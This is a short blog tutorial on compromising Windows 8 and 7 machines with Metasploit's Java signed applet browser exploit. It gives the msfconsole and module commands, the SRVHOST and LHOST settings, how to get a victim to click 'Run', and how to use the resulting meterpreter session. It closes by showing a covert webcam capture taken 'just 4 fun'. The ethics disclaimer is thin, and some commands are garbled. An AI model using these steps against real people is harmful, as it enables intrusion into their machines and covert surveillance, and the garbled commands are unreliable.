Security: Methods to explore
Windows 8 and windows 7.
By Rafael Fontes (Backtrack Team).
ABSTRACT
Readers, this article everybody would be going
to understand techniques to exploit the operating system Microsoft Windows 8
(only for teaching purposes, for network administrators and security
specialists understand how the mind works and to prevent the attacker). Through
the Metasploit will learn how to hack some machines with Windows OS vulnerable,
Windows 7 SP1 other OS is also applicable.
INTRODUCTION
This exploit works "using Java Signed Applet
Method" on any browser, but requires the java plugin installed, a file is
created. "Jar", it is necessary that the target open a URL and allow
the java applet to run in the browser. The applet is presented to the target
through a web page. The Java Virtual Machine, of the victim will pop up a
window asking if they trust the signed applet, after the victim clicks on
"run" the applet is run with full permissions.
STEP
BY STEP
Requirements
for pentest:
I.
You
must have installed the Windows 8 operating system.
II.
Some
target computer or VMware (Virtual Machine) with a Linux distribution, can be
Backtrack or Kali, whatever, the important thing is to have the “metasploit” up
and running.
First
reader, you need to open the terminal and enter the command:
"msfconsole".
Figure 1) Open metasploit.
After, we choose the exploit to use:
Let’s
type use
exploit/multi/browser/java_signed_applet .
Press
enter and type “Show options”.
Figure 2) Use exploit and
show options.
Essential concepts:
The SRVHOST and SRVPORT have defined default values 0.0.0.0 and 8080.
The SRVHOST is the IP address that the server will work to make the connection
url to be opened by the target browser. SRVHOST is set to 0.0.0.0, the target
must be able to connect to this machine using your public ip.
Figure 3) Set payload.
The LHOST should be the IP address that the victim is
connected.
Figure 4) LHOST and
exploit.
When the target open this link on your browser displays a warning in a
dialog box .
A window will open, and the victim can check the "I accept the risk
and want to run this application", click "Run".
Figure 5) Java applet.
FINISHING
Therefore, after the victim open the malicious URL, then click Run,
Metasploit will start a meterpreter session to the target machine, and you get
full access!
You can directly run "sessions l" to see the active sessions.
Example: sessions-i 1, where 1 is the ID of the session.
The applet is able to connect to Metasploit.
Meterpreter session starts and is ready, as planned, and available
options for you to exploit the system.
Figure 6) Session starts.
This article is only for ethical hacking, now you can have
fun with the commands.
Figure 7) Webcam shot: Just
4 fun.
0 comments:
Post a Comment
Note: only a member of this blog may post a comment.